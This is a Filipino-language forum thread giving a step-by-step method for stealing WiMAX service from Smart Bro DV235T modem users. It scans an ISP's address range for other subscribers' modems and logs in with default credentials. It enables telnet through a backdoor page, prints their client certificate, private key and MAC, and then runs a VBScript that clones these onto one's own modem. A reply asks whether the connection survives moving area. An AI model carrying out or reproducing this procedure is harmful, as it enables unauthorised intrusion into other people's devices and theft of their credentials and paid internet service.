How To Change MAC On DV235T Scan IP, Get Certficate And Key

classic Classic list List threaded Threaded
2 messages Options
Reply | Threaded
Open this post in threaded view
|

How To Change MAC On DV235T Scan IP, Get Certficate And Key

Dgit23
Administrator
Try nalang kung working paba eto. Actually diko pa nasusubukan at pulot lang sa ibang forum.

TELNET METHOD + Backdoor :

First donwload AngryIP Scanner ( Search nyo nalang sa google )
Scan tru angryIP
Pag nakuha mo na yung IP paste mo sa browser mo then login using smart/smart

Example :
 http://10.0.128.12/ login smart/smart ganito lalabas sa browser mohttp://10.0.128.12/index.html?WWW_SID=SID29187

Open new browser at paste nyo yung ip (10.0.128.12) + adv-firewall.html? + WWW_SID=SID29187 (galing to sa address ng ip na lumabas after mo mag login)

Example:  http://10.0.128.12/adv-firewall.html?WWW_SID=SID29187Then enable telnet. (Note: isara po ulit natin pagkatapos para masaya)

Now time to scan and get the certificate...
(ngayon pwede na tayong umusad sa pag scan ng cert kasi open na si telnet)

(Recomended use Putty to copy/paste ang mga cert)
*Open CMD
*Type telnet + ip of the targer (Ex. telnet 10.0.128.12)
*Type mt7109
*Type wimax (note: di po talaga mag aapear yung tinype nyo)
*Type cd
*Type cd /etc


*Type ls

Makikita nyo kung may nakalagay na wmx_client_ca.pem at wmx_priv_key.key sa panel pag wala kayong nakita move on sa next IP.

Kapag may nakita kayong wmx_client_ca.pem at wmx_priv_key.key

Type this:

*cat wmx_client_ca.pem
* cat wmx_priv_key.key
*sncfg get WAN_MAC

Kung na putty kayo at naka set logfile nyo automatic save yan dun.

Pano mo naman ilalagay sa modem mo yung mga Files na nakuha mo? or
How to insert / use this cert and key to DV235T?

• Log in  https://192.168.15.1 using admin account >Click Wimax> Profile> Authentication settings.

• then SAVE!

Now How to Change MAC After  you completely done?
Para mag change ng MAC need nyo ng no reboot script:

Set blognisher = CreateObject("WScript.Shell")
blognisher.run"cmd"
WScript.Sleep 500

blognisher.SendKeys"color a"
blognisher.SendKeys("{Enter}")
WScript.Sleep 1000

blognisher.SendKeys"telnet 192.168.15.1"
blognisher.SendKeys("{Enter}")
WScript.Sleep 4000

blognisher.SendKeys"admin"
blognisher.SendKeys("{Enter}")
WScript.Sleep 1000

blognisher.SendKeys"secret"
blognisher.SendKeys("{Enter}")
WScript.Sleep 1000

blognisher.SendKeys"enable"
blognisher.SendKeys("{Enter}")
WScript.Sleep 1000

blognisher.SendKeys"router"
blognisher.SendKeys("{Enter}")
WScript.Sleep 1000

blognisher.SendKeys"wan mac 00:1F:FB:XX:XX:XX"
blognisher.SendKeys("{Enter}")
WScript.Sleep 1000

blognisher.SendKeys"commit"
blognisher.SendKeys("{Enter}")
WScript.Sleep 1000

blognisher.SendKeys"exit"
blognisher.SendKeys("{Enter}")
WScript.Sleep 1000

blognisher.SendKeys"wimax"
blognisher.SendKeys("{Enter}")
WScript.Sleep 1000

blognisher.SendKeys"wmx auth username smart1_lancelot"
blognisher.SendKeys("{Enter}")
WScript.Sleep 1000

blognisher.SendKeys"smart1_lancelot"
blognisher.SendKeys("{Enter}")
WScript.Sleep 1000

blognisher.SendKeys"wmx auth a-id YOUR MAC W/O ":"

@smartbro.net"
blognisher.SendKeys("{Enter}")
WScript.Sleep 1000

blognisher.SendKeys"wmx auth auto-prepend disable"
blognisher.SendKeys("{Enter}")
WScript.Sleep 1000

blognisher.SendKeys"wmx auth ignore-cv disable"
blognisher.SendKeys("{Enter}")
WScript.Sleep 1000

blognisher.SendKeys"commit"
blognisher.SendKeys("{Enter}")
WScript.Sleep 1000

blognisher.SendKeys"exit"
blognisher.SendKeys("{Enter}")
WScript.Sleep 1000

blognisher.SendKeys"reboot"
blognisher.SendKeys("{Enter}")
WScript.Sleep 1000

blognisher.SendKeys"DV-235T User's Lounge (Symbianizer's

Dock)"
WScript.Sleep 1000Reply | Threaded
Open this post in threaded view
|

Re: How To Change MAC On DV235T Scan IP, Get Certficate And Key

aahemsley
pag ba nag connect sa isang lugar (nagconnected) at lumipat sa ibang area mag coconnected pa dn po ba?